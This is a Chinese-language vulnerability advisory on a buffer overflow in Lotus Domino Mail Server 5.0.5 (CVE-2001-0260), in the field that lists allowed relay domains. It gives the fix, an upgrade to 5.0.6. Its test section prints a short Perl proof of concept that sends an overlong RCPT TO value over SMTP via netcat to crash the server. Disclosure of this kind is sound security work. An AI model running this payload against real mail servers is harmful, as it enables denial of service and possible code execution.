发布日期：2001-02-02
更新日期：2001-02-02

受影响系统：

Lotus Domino Mail Server 5.0.5

不受影响系统：

Lotus Domino Mail Server 5.0.6

描述：

---

BUGTRAQ  ID: 2283
CVE(CAN) ID: CVE-2001-0260
  
Lotus Domino邮件服务器未能正确检查由用户提供输入值的一个字段，该字段是用来
指定邮件转发策略中所允许的域名的。

结果，如果该策略特性被允许的话，将恶意构造的值作为输入赋给该字段就可以使相
关的缓冲区溢出，这将允许攻击者将服务器击溃或者以邮件服务器的权限执行任意代
码。

成功地利用这个漏洞可以使主机被完全侵害。

<* 来源：Security Research Team (security@relaygroup.com) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

将下面的allowed.domain.com改成相应的域名，并利用netcat将下面的程序的输
出发送给邮件服务器，就可能使其崩溃：

#!/usr/bin/perl
$req="a" . "%A"x200 . "A"x600 . "%allowed.domain.com\@allowed.domain.com";
print "ehlo foo\nmail from: blah\@example.com\nrcpt to:$req\ndata\nfoo\n.\nquit\n";




建议：

---

厂商补丁：

升级到Lotus Domino Mail Server 5.0.6
http://www.notes.net/r5fixlist.nsf/6d4eae9850a5c2c28525690400551b57/5eea8322c479de968525697d00737ad5?OpenDocument


浏览次数：5623
严重程度：0（网友投票）